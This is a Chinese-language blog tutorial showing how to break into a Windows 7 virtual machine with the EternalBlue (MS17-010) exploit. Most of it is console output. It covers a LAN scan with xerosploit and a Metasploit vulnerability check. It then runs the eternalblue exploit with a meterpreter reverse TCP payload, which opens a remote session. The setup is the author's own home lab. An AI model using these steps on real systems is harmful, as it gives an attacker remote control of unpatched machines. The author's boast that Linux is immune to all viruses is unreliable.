使用永恒之蓝(MS17-010)漏洞入侵windows7

永恒之蓝简介

前几天,被勒索病毒(Wannacry)刷屏了,这个病毒是大家知道了备份文件的重要性,当然,我是不怕什么病毒的,因为我是一天备份一次文件,而且微云一份,坚果云,移动硬盘一份,就算被黑了又能怎样,最多花个一天时间装个系统,配置一下系统。而且我是不用垃圾windows的,linux百毒不侵,而且我的系统是天天更新。所以说被黑了一半的原因在于自己真的没有意识,都2017年了,还把文件放在本地电脑硬盘上,什么心态。Mother Fuck
话题扯远了,wannacry是利用永恒之蓝漏洞做的,所以说你只要不开放局域网网络共享,也就是不开放445端口就没有你的什么事情了

顺便说一下wannacry的汉化,我操,真的是贴心,可以说是2017最佳汉化程序,如果做steam游戏的厂商用做病毒的心态去做,还怕我们中国玩家差评?不存在的

渗透测试环境搭建

首先安装一台虚拟x64的windows7然后按照下面一步一步打开网络共享
点击 文件管理器->网络然后


点击网络发现 和文件共享已关闭..........


点击启用网络共享


点击是


看到上面这样子,就是成功了
注意网络最好是桥接的
之后这台虚拟机就可以不用理它了,开着就好

开始入侵

首先更新一下metasploit
msfupdate
注意,最新版本的metasploit会提示
msfupdate is no longer supported when Metasploit is part of the operating system. Please use 'apt update; apt install metasploit-framework'
无所谓啦,你输入apt update && apt install metasploit-framework更新系统也没有事情的
之后扫描一下局域网内的机器
我喜欢用xerosploit扫描局域网,因为方便,如果不知道怎么安装和使用的同学,可以看我这篇博客
http://www.bboysoul.cn/2017/07/01/%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB%E5%B7%A5%E5%85%B7(Xerosploit)/
操作看下面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
[email protected]:~# xerosploit


██╗ ██╗███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
╚███╔╝ █████╗ ██████╔╝██║ ██║███████╗██████╔╝██║ ██║ ██║██║ ██║
██╔██╗ ██╔══╝ ██╔══██╗██║ ██║╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
██╔╝ ██╗███████╗██║ ██║╚██████╔╝███████║██║ ███████╗╚██████╔╝██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

[ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█ █
█ Your Network Configuration █
█ █
└═════════════════════════════════════════════════════════════════════════════┘

╒═══════════════╤═══════════════════╤═════════════╤═════════╤════════════╕
│ IP Address │ MAC Address │ Gateway │ Iface │ Hostname │
╞═══════════════╪═══════════════════╪═════════════╪═════════╪════════════╡
│ │ │ │ │ │
├───────────────┼───────────────────┼─────────────┼─────────┼────────────┤
│ 192.168.1.106 │ 08:00:27:7B:3D:E7 │ 192.168.1.1 │ eth0 │ kali │
╘═══════════════╧═══════════════════╧═════════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║ ║ XeroSploit is a penetration testing toolkit whose goal is to ║
║ Information ║ perform man in the middle attacks for testing purposes. ║
║ ║ It brings various modules that allow to realise efficient attacks. ║
║ ║ This tool is Powered by Bettercap and Nmap. ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ scan

[++] Mapping your network ...

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═══════════════╦═══════════════════╦════════════════════════════════╗
║ IP Address ║ Mac Address ║ Manufacturer ║
╠═══════════════╬═══════════════════╬════════════════════════════════╣
║ 192.168.1.1 ║ 6C:59:40:EB:2C:E4 ║ (Shenzhen MercuryCommunication ║
║ 192.168.1.100 ║ B8:27:EB:CE:05:C6 ║ (Raspberry PiFoundation) ║
║ 192.168.1.105 ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology) ║
║ 192.168.1.107 ║ 08:00:27:B3:74:87 ║ (Oracle VirtualBoxvirtual ║
║ 192.168.1.106 ║ 08:00:27:7B:3D:E7 ║ (This device) ║
║ ║ ║ ║
╚═══════════════╩═══════════════════╩════════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮ 192.168.1.107

[++] 192.168.1.107 has been targeted.

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ pscan

┌══════════════════════════════════════════════════════════════┐
█ █
█ Port Scanner █
█ █
█ Find open ports on network computers and retrieve █
█ versions of programs running on the detected ports █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮ run

[++] Please wait ... Scanning ports on 192.168.1.107

[+]═════════[ Port scan result for 192.168.1.107 ]═════════[+]

╔══════════════╦══════════╦═══════╗
║ SERVICE ║ PORT ║ STATE ║
╠══════════════╬══════════╬═══════╣
║ MSRPC ║ 135/TCP ║ OPEN ║
║ NETBIOS-SSN ║ 139/TCP ║ OPEN ║
║ MICROSOFT-DS ║ 445/TCP ║ OPEN ║
║ WSDAPI ║ 5357/TCP ║ OPEN ║
║ ║ ║ ║
╚══════════════╩══════════╩═══════╝

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮

首先看到局域网内有5台电脑,第一台是我的路由器,第二台是我的树莓派,第三台是我的主电脑,第四台是windows7虚拟机,第五台是我的kali虚拟的
扫描一下windows7虚拟机,确认445端口是开放的
然后打开meatsploit攻击,操作看下面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
[email protected]:~# msfconsole


.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .


=[ metasploit v4.14.27-dev ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search ms17-010
[!] Module database cache not built yet, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption


msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.107
rhosts => 192.168.1.107
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.107 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_ms17_010) > run

[+] 192.168.1.107:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > set payload windows/x64/
set payload windows/x64/exec set payload windows/x64/meterpreter/reverse_winhttps set payload windows/x64/vncinject/bind_ipv6_tcp
set payload windows/x64/loadlibrary set payload windows/x64/powershell_bind_tcp set payload windows/x64/vncinject/bind_ipv6_tcp_uuid
set payload windows/x64/meterpreter/bind_ipv6_tcp set payload windows/x64/powershell_reverse_tcp set payload windows/x64/vncinject/bind_tcp
set payload windows/x64/meterpreter/bind_ipv6_tcp_uuid set payload windows/x64/shell/bind_ipv6_tcp set payload windows/x64/vncinject/bind_tcp_uuid
set payload windows/x64/meterpreter/bind_tcp set payload windows/x64/shell/bind_ipv6_tcp_uuid set payload windows/x64/vncinject/reverse_http
set payload windows/x64/meterpreter/bind_tcp_uuid set payload windows/x64/shell/bind_tcp set payload windows/x64/vncinject/reverse_https
set payload windows/x64/meterpreter/reverse_http set payload windows/x64/shell/bind_tcp_uuid set payload windows/x64/vncinject/reverse_tcp
set payload windows/x64/meterpreter/reverse_https set payload windows/x64/shell/reverse_tcp set payload windows/x64/vncinject/reverse_tcp_uuid
set payload windows/x64/meterpreter/reverse_tcp set payload windows/x64/shell/reverse_tcp_uuid set payload windows/x64/vncinject/reverse_winhttp
set payload windows/x64/meterpreter/reverse_tcp_uuid set payload windows/x64/shell_bind_tcp set payload windows/x64/vncinject/reverse_winhttps
set payload windows/x64/meterpreter/reverse_winhttp set payload windows/x64/shell_reverse_tcp
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.1.107 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.106 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::a00:27ff:fe7b:3de7 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:7b:3d:e7 txqueuelen 1000 (Ethernet)
RX packets 4305 bytes 483899 (472.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11338 bytes 2843116 (2.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 8 bytes 396 (396.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 396 (396.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.106
lhost => 192.168.1.106
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.1.107 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.106 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.106:4444
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.1.107:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.107:49159) at 2017-07-02 04:15:38 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

首先我打开了metasploit,然后搜索了一下metasploit中和ms17-010相关的东西,发现有一个辅助模块和一个利用模块,然后我用辅助模块探测了我这台windows 7有没有ms17-010的漏洞,显示
[+] 192.168.1.107:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
表示目标系统有此漏洞,之后我用利用模块,然后再加载了一个后门载荷,设置了目标的ip和后门载荷所需要的本地ip之后执行exploit,成功拿到session

注意此攻击利用模块和后门载荷只对x64的系统有效。

Have fun

欢迎关注我的其它发布渠道